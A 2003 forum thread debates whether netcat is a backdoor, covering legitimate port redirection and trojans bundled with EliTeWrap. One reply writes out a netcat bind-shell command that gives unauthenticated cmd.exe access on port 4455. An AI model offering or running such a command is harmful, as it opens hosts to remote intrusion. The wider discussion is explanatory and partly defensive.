June 9th, 2003, 09:34 AM
newbie question regarding netcat
would u pls ansr this question :
why are not netcat ( The Swiss Army Knife ) considre a backdoor?
June 9th, 2003, 10:19 AM
It is considerd a back door as far as I know.
goto start>run> and type nc.exe-1 -p4455 -e cmd.exe
there ya go anyone telneting to port 4455 ont that box gets dos without login prompt.
It just isn't as nice as most trojans cause there is no gui
nc.exe -1 -p4455 -e cmd.exe
Hi, I don\'t care........ Thanks
June 9th, 2003, 01:46 PM
netcat could be considered a trojan i guess, as stated in Lithium's post, but it can be used for many other legitimate purposes as well. I use it mainly for port redirection for outbound traffic from a secured subnet. DNS, SNMP and other services could all point to the netcat host, and the netcat host then redirects traffic through the firewall. The benefit to this of course is that you only have to allow outbound traffic from a single source IP on the firewall.
June 9th, 2003, 02:02 PM
Yep, that is one useful legitimate use for netcat.
The benefit to this of course is that you only have to allow outbound traffic from a single source IP on the firewall.
People looking to misuse netcat will use it (I wont post the howto) to take advantage of open ports on a firewall via a reverse telnet session. This is one of the backdoor functions that netcat can perform. Also, someone else posted the remote shell capability, which is used as a staging step for actually getting a GUI backdoor up and running on a compromised host. For more NFO on how this can happen to you, look into a program called EliTeWrap. Through simple scripting, it delivers a set of backdoor programs via a single EXE file. I have actually seen this used and there are a few countermeasures such as looking to see if someone left the signature behind. You can check with a simple "Find" command against the file (Find EliTeWrap elfbowling.exe) the output would show the EliTeWrap signature along with the version. Anyway, this isn't always effective but I remember having that stupid elfbowling game circulating and it had EliTeWrap bundled with netcat and a few other nasties designed to gain remote access to any host that happened to launch the game.
Anyway, for what its worth....
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
June 9th, 2003, 09:00 PM
interestingly enough, most tools that i've used can be considered a hacking tool but it really depends on the term hacker. i use these tools to troubleshoot and test network, like i said just a tool.